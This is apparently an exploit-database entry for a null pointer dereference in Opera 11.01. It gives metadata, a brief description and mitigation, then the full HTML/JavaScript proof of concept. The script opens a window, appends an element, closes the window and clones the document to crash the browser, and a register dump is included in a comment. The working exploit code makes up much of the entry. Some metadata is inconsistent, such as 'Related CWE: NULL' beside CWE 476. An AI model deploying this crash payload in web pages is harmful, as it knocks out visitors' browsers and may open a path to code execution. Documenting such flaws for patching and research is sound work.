Opera 11.01 Null Ptr Derefer

vendor:

Opera

by:

echo

7.5

CVSS

HIGH

Null Pointer Dereference

476

CWE

Product Name: Opera

Affected Version From: 11.01

Affected Version To: 11.01

Patch Exists: YES

Related CWE: NULL

CPE: o:opera_software:opera

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win32 xp home sp 2

2011

Opera 11.01 Null Ptr Derefer

A vulnerability in Opera 11.01 allows an attacker to cause a null pointer dereference by creating an element in a window and then closing it, followed by cloning the document. This can lead to a denial of service or potentially allow arbitrary code execution.

Mitigation:

Upgrade to the latest version of Opera 11.01 or later.

Source

Exploit-DB raw data:

<html>
  <head>
  <title>Opera 11.01 Null Ptr Derefer</title>
  </head>
  <body>
   <script type="text/JavaScript" language="JavaScript">
   
    /*
    * [+]. Title : Opera 11.01 Null Pointer Derefernce 
    * [+]. Date : 15.03.2011 05:18
    * [+]. Author: echo
    * [+]. Version: 11.01
    * [+]. Software link: http://www.opera.com/download/
    * [+]. Tested on : Win32 xp home sp 2
    * [+]. CVE : NULL    
    * ---------------------------------------
    * 675B5646  MOV ECX,DWORD PTR DS:[EDI+8]   
    * DS:[00000008]=???
    * ECX=00000000   
    * EDI=00000000                    
    */
    var iWin  = window.open();
    var iShit = iWin.document.createElement("ANY");
        iWin.document.body.appendChild(iShit);
        iWin.close();
        iWin.document.cloneNode("HiH");  
        
   </script>
  </body>
</html>